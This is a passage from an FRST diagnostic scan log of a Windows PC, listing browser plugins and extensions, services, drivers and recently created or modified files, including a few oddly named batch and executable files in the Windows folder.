FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-18]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-09-26]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
S2 hshld; C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe [192384 2019-11-04] (AnchorFree Inc -> AnchorFree Inc.)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R3 NMIndexingService; C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe [382248 2007-09-20] (Nero AG -> Nero AG)
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 avgbu57v; C:\Windows\System32\Drivers\avgbu57v.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-18 14:53 - 2019-11-18 14:55 - 000047409 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-18 14:24 - 2019-11-18 14:54 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-17 00:22 - 2019-11-18 14:10 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-17 00:22 - 2019-11-18 14:10 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 17:31 - 2019-11-16 17:46 - 000000000 ____D C:\Program Files (x86)\Avira
2019-11-16 16:54 - 2019-11-16 16:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot Shield
2019-11-16 16:54 - 2019-11-16 16:54 - 000000000 ____D C:\Program Files (x86)\Hotspot Shield
2019-11-16 16:52 - 2019-11-16 16:54 - 000001028 _____ C:\Users\Public\Desktop\Hotspot Shield.lnk
2019-11-16 16:52 - 2019-11-16 16:54 - 000001028 _____ C:\ProgramData\Desktop\Hotspot Shield.lnk
2019-11-16 16:40 - 2019-11-16 16:54 - 000000000 ____D C:\ProgramData\Hotspot Shield
2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-18 01:34 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-18 01:34 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
==================== One month (modified) ==================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-18 14:05 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-11-18 14:05 - 2009-07-14 05:45 - 000016816 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-11-18 14:03 - 2013-03-19 22:08 - 000746014 _____ C:\Windows\system32\perfh00C.dat
